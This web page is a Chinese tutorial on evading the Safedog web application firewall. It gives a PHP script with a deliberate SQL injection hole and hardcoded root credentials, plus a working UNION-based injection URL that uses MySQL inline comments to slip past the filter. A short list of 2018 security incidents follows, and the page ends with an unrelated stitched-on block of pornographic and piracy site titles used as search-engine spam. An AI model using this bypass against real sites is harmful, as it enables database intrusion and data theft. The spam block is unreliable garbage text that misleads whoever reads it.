• <output id="aynwq"><form id="aynwq"><code id="aynwq"></code></form></output>

    <mark id="aynwq"><option id="aynwq"></option></mark>
  • <mark id="aynwq"><option id="aynwq"></option></mark><label id="aynwq"><dl id="aynwq"></dl></label>
  • 學習啦 > 學習電腦 > 電腦安全 > 網絡安全知識 >

    如何繞過安全狗防護軟件

    時間: 加城1195 分享

      網絡安全是目前互聯網的熱門話題之一,作為個人用戶的我們同樣需要關注,做好防護。安全狗是一款大家熟悉的服務器安全加固產品,據稱已經擁有50W的用戶量。最近經過一些研究,發現安全狗的一些防護功能,例如SQL注入、文件上傳、防webshell等都可以被繞過,下面為大家一一介紹。

      方法步驟

      本次測試環境為

      中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72

      網站安全狗IIS版3.2.08417

      SQL注入繞過

      我們先寫一個存在SQL注入漏洞的php:

      $uid = $_REQUEST['id'];

      if(!$conn = @mysql_connect("localhost", "root", "123456"))

      die('An Error Occured

      unable to connect to the database.');

      if(!@mysql_select_db("supe",$conn))

      die("An Error Occured

      unable to find it at database on your MySQL server.");

      $text = "select * from supe_members where uid=".$uid;

      $rs = mysql_query ($text,$conn);

      while($rom = mysql_fetch_array($rs))

      {

      echo $rom["username"];

      }

      ?>

      我用的是supesite的庫,可以看到這里是有明顯SQL注入漏洞的,當沒有安全狗的時候可以成功注入:

      當安裝安全狗之后,注入語句會被攔截:

      經過測試發現,安全狗這塊的匹配正則應該是\s+and這類的,所以只要想辦法去掉空格,用普通注釋/**/是不行的,安全狗也防了這塊。但是對內聯注釋/*!and*/這種不知道為什么安全狗沒有攔截。

      用下面語句成功繞過SQL注入過濾:

      http://192.168.200.115/inj.php?id=1/*!and*/1=2/*!union*//*!select*/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17

      有人說只有POST才可以,但是我測試最新版本的安全狗GET注入也是可以用這種方法繞過的。

      相關閱讀:2018網絡安全事件:

      一、英特爾處理器曝“Meltdown”和“Spectre漏洞”

      2018年1月,英特爾處理器中曝“Meltdown”(熔斷)和“Spectre” (幽靈)兩大新型漏洞,包括AMD、ARM、英特爾系統和處理器在內,幾乎近20年發售的所有設備都受到影響,受影響的設備包括手機、電腦、服務器以及云計算產品。這些漏洞允許惡意程序從其它程序的內存空間中竊取信息,這意味著包括密碼、帳戶信息、加密密鑰乃至其它一切在理論上可存儲于內存中的信息均可能因此外泄。

      二、GitHub 遭遇大規模 Memcached DDoS 攻擊

      2018年2月,知名代碼托管網站 GitHub 遭遇史上大規模 Memcached DDoS 攻擊,流量峰值高達1.35 Tbps。然而,事情才過去五天,DDoS攻擊再次刷新紀錄,美國一家服務提供商遭遇DDoS 攻擊的峰值創新高,達到1.7 Tbps!攻擊者利用暴露在網上的 Memcached 服務器進行攻擊。網絡安全公司 Cloudflare 的研究人員發現,截止2018年2月底,中國有2.5萬 Memcached 服務器暴露在網上 。

      三、蘋果 iOS iBoot源碼泄露

      2018年2月,開源代碼分享網站 GitHub(軟件項目托管平臺)上有人共享了 iPhone 操作系統的核心組件源碼,泄露的代碼屬于 iOS 安全系統的重要組成部分——iBoot。iBoot 相當于是 Windows 電腦的 BIOS 系統。此次 iBoot 源碼泄露可能讓數以億計的 iOS 設備面臨安全威脅。iOS 與 MacOS 系統開發者 Jonathan Levin 表示,這是 iOS 歷史上最嚴重的一次泄漏事件。

      四、韓國平昌冬季奧運會遭遇黑客攻擊

      2018年2月,韓國平昌冬季奧運會開幕式當天遭遇黑客攻擊,此次攻擊造成網絡中斷,廣播系統(觀眾不能正常觀看直播)和奧運會官網均無法正常運作,許多觀眾無法打印開幕式門票,最終未能正常入場。

      五、加密貨幣采礦軟件攻擊致歐洲廢水處理設施癱瘓

      2018年2月中旬,工業網絡安全企業 Radiflow 公司表示,發現四臺接入歐洲廢水處理設施運營技術網絡的服務器遭遇加密貨幣采礦惡意軟件的入侵。該惡意軟件直接拖垮了廢水處理設備中的 HMI 服務器 CPU,致歐洲廢水處理服務器癱瘓 。

      Radiflow 公司稱,此次事故是加密貨幣惡意軟件首次對關鍵基礎設施運營商的運營技術網絡展開攻擊。由于受感染的服務器為人機交互(簡稱HMI)設備,之所以導致廢水處理系統癱瘓,是因為這種惡意軟件會嚴重降低 HMI 的運行速度。


    服務器安全相關文章:

    1.服務器維護安全策略

    2.服務器安全維護技巧

    3.Linux 服務器提高安全性的技巧方法

    4.有哪些方法可以提高Linux服務器安全性

    5.教你如何配置自己的網站服務器

    4040983 主站蜘蛛池模板: 日韩中文字幕视频在线| 波多野结衣免费观看视频| 在线综合亚洲欧美自拍| 精品人妻少妇一区二区三区| 久久精品一区二区三区日韩| 日韩精品一区二区三区在线观看 | 国产成人精品999在线观看| 2022男人天堂| 国产一区二区精品久久岳| 美女下面直流白浆视频| 亚洲欧美自拍明星换脸| 国色天香中文字幕视频| 毛片手机在线观看| 国产区在线视频| 精品国产一区二区三区久久狼| 亚洲成av人影片在线观看| 无遮无挡非常色的视频免费| aaa一级最新毛片| 国产真实交换多p免视频| 欧美另类视频videosbest18| 乱理电影不卡4k4k| 国产一级一级片| 成人片在线观看地址KK4444| 日本免费xxxx色视频| 国产精品嫩草影院永久一| 真实国产乱子伦高清| 久久久亚洲精品国产| 咪咪色在线视频| 国产日韩欧美不卡在线二区| 大bbwbbwbbwvideos| 狂野欧美性猛交xxxx巴西| 国产午夜亚洲精品不卡| 成人人免费夜夜视频观看| 极端deepthroatvideo肠交| 热99re久久精品2久久久| 试看120秒做受小视频免费| 久久成人福利视频| 亚洲欧洲免费无码| 俺去啦在线观看| 内蒙大叔打桩机| 国产精品久久久久久一区二区三区|